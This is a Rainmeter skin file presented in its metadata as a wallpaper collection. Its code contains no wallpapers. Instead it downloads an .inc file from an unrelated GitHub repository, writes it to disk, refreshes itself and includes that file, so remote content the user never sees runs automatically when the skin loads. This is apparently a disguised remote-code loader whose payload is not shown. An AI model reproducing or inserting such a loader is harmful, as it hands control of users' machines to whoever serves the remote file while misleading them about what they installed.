[Rainmeter]
Update=-1

DefaultKeepOnScreen=0

[Metadata]
Name=Needed Wallpapers 
Author=Nasir Shahbaz
Information=Not Need to visit websites enjoy wallpapers in one package
License=@CopyRight 2024
Version=9.1

[Variables]
Parsed=0

[CheckParsed]
Measure=String
String=#Parsed#
IFmatch=0
IfMatchaction=[!WriteKeyValue Variables Parsed 1][!Delay 1000][!Refresh]
IfNotMatchAction=[!WriteKeyValue Variables Parsed 0]

[GetStart]
Measure=WebParser
URL=https://raw.githubusercontent.com/Nek-Start/NekStart/main/NekShell/Start/Main.inc
Debug=2
Debug2File=DownloadFile\Parsed.inc

[DummyString]
Meter=String

; ---------------------------------------------------------------------------- ;
;                                    Parsed                                    ;
; ---------------------------------------------------------------------------- ;

@includeParsed=DownloadFile\Parsed.inc
